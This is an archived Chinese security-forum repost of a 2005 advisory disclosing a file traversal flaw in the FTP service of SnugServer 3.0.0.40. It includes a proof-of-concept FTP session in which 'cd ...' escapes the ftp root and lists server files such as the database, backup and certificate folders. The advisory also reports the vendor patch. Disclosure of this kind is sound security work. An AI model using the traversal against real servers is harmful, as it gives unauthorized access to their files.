邪恶八进制信息安全团队技术讨论组's Archiver

EvilOctal 2005-1-28 18:39

[转载]Remotely exploitable file traversal vulnerability in SnugServer 3.0.0.40

文章作者:seclists.org

[-] Product Information

SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can be stored in a
data file to prevent internal network hacker attacks. Product
Homepage: [url]http://www.snugserver.com/[/url]

[-] Vulnerability Description

A file traversal vulnerability has been discovered in
SnugServer 3.0.0.40 FTP Service, which allows access to the
server filesystem, outside of ftproot.

[-]PoC

root_at_Whoppix:/# ftp 192.168.1.154
Connected to 192.168.1.154.
220-
Welcome FTP User. SnugServer is ready.
Name (192.168.1.154:root): muts_at_default.com
331 Password required for muts_at_default.com.
Password:
230 See FTP Server
Remote system type is You.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 02:08 dir
226 Transfer Complete.
ftp> cd ...
200 PORT Command Successful.
ftp> ls
200 PORT Command Successful.
150 Opening ASCII mode data connection for directory listing.
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ..
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Cert
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Logs
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Requests
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Scripts
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Errors
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Queue
drw-rw-rw- 1 owner group 0 Jan 21 03:51 www
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Infected
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Temp
drw-rw-rw- 1 owner group 0 Jan 21 03:51 Filtered
drw-rw-rw- 1 owner group 0 Jan 21 03:51 BaseData
-rw-rw-rw- 1 owner group 8421376 Jan 21 03:52 SNUG.FDB
drw-rw-rw- 1 owner group 0 Jan 21 03:51 ftp
-rw-rw-rw- 1 owner group 1861120 Jan 21 03:52 Snug.gbk
-rw-rw-rw- 1 owner group 32 Jan 21 03:52 yarrow.rnd
226 Transfer Complete.
ftp>

[-] Patch

The vendor has been notified, and an update is available at:

[url]http://www.snugserver.com/download.php[/url]

[-] Credits

This vulnerability was discovered by muts

页: [1]
© 1999-2008 EvilOctal Security Team